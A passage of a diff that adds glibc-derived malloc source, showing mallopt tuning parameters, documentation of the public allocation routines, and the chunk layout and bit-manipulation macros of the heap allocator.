+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   the maximum total allocated space. This will be greater
+		than current total if trimming has occurred.
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+#ifndef NO_THREADS
+static void*   malloc_atfork(size_t sz, const void *caller);
+static void      free_atfork(void* mem, const void *caller);
+#endif
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
